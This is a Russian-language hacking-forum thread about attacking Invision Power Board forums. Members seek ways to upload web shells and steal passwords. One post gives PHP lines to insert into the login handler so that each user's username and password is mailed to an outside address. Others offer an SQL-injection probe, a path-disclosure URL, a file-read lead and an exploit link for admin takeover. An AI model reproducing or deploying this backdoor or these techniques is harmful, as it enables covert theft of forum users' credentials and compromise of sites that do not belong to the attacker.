Форумы [Обзор уязвимостей IPB]

Discussion in 'Уязвимости CMS/форумов' started by Kakoytoxaker, 26 Oct 2008.

  1. Sirius05

    Sirius05 New Member

    Joined:
    20 Mar 2011
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    как применить эти две уязвимости дляя 3.3х не подскажите
     
  2. Revi

    Revi New Member

    Joined:
    17 Dec 2011
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Кто знает как залить шелл на IP.Board 3.3.3?
     
  3. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    Привет всем! Возможно както залить шелл имея права модера?
     
  4. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Можно при условии, что Вас пускает в администраторскую панель с модераторскими правами.
     
    _________________________
  5. ph1l1ster

    ph1l1ster Elder - Старейшина

    Joined:
    11 Mar 2008
    Messages:
    396
    Likes Received:
    153
    Reputations:
    19
    К сожалению нет. В папке с админкой .htaccess и доступ только для определенных IP
    Через аттачи не? Заливается но не выполняется. lfi нет
     
    #65 ph1l1ster, 28 Jan 2013
    Last edited: 28 Jan 2013
  6. korp

    korp New Member

    Joined:
    26 Sep 2008
    Messages:
    29
    Likes Received:
    4
    Reputations:
    0


    Подскажите пример использования, весь мозг себе вынес.
     
  7. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Имею полный доступ к ipb 3.4.2, хочу поставить сниффер для отправки паролей на майл, или сохранения в файл, кому не сложно скиньте и объясните как установить и куда. Заранее благодарю.
     
  8. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Мужики, а есть эксплоит под версию 3.4.4

    P.S Выдало ошибку PB Предупреждение [2] mysql_connect() [function.mysql-connect]: [2002] No connection could be made because the target machine actively refused it. (trying to connect via tcp://localhost:3306) (Строка: 141 файла \ips_kernel\class_db_mysql.php)
    IPB Предупреждение [2] mysql_connect() [function.mysql-connect]: No connection could be made because the target machine actively refused it. (Строка: 141 файла \ips_kernel\class_db_mysql.php)
     
  9. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    916
    Likes Received:
    120
    Reputations:
    25

    в файле /forum/sources/action_public/login.php или /forum/admin/sources/handlers/han_login.php не помню в какой версии какой путь. Сразу под строкой // Check auth вставляй следующее чтоб получилось так:

    HTML:
    $this->loginAuthenticate( $username, $email, $password );
    $ipsclass_all = $username . ":" . $password;
    mail('василийпупкин@gmail.com', '123', $ipsclass_all);
     
  10. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Короче на движке IPB, когда заходишь в любую тему, внизу выходит окно с ошибкой SQL: [​IMG]

    P.S И собственно вопрос, можно как-нибудь пробить путь к таблицам
     
  11. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Если в урл, вместо ид топика поставь -1) -- - - что напишет ?
     
  12. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Сообщение форума

    Обнаружена ошибка. Если вам неизвестны причины ошибки, попробуйте обратиться к разделам помощи.
    Обнаружена ошибка:

    Некоторые требуемые файлы отсутствуют. Если вы хотели просмотреть тему, возможно эта тема перемещена или удалена. Вернитесь назад и попробуйте снова.

    P.S Т.е SQL ошибки нет.
     
  13. miosaki

    miosaki New Member

    Joined:
    5 Jan 2013
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Ребята как узнать айпи адресс человека на IPB форуме?
    http://iplogger.ru/1fFc3.jpg

    а чо за айпи логгер?
     
  14. zippy

    zippy New Member

    Joined:
    31 Jul 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Если на линейке 3.4.0 - 3.4.5 не стоит этот патч, то можно ли прочитать файлы форума через public/min/index.php?f=
     
  15. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Я так смотрю под версии 3.2.х вообще ничего нету, а если и есть, то работает на дырявых и заброшенных сайтах.
     
  16. ForcePush

    ForcePush New Member

    Joined:
    14 Jul 2013
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Path disclosure:

    Code:
    admin/upgrade/index.php?app=upgrade&s[]=&section=index&do=login
    2 года назад пофиксили section[], может скоро и до s[] доберутся...
     
  17. MarShaLL22

    MarShaLL22 New Member

    Joined:
    2 Aug 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover Published: 2013-05-14
    http://www.exploit-db.com/exploits/25441/
    Пробуй. Заодно, если получится, мануал накидай небольшой, будь добр.
     
  18. sysjuk

    sysjuk Member

    Joined:
    5 Jan 2012
    Messages:
    230
    Likes Received:
    58
    Reputations:
    5
    Ваш способ не работает, проверил только-что. Есть еще какие варианты?
     
  19. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    На IP.Board 2.3.6 есть что нить ?
     
  20. Deda_net

    Deda_net New Member

    Joined:
    29 Sep 2016
    Messages:
    40
    Likes Received:
    0
    Reputations:
    0
    Подскажите как юзать его?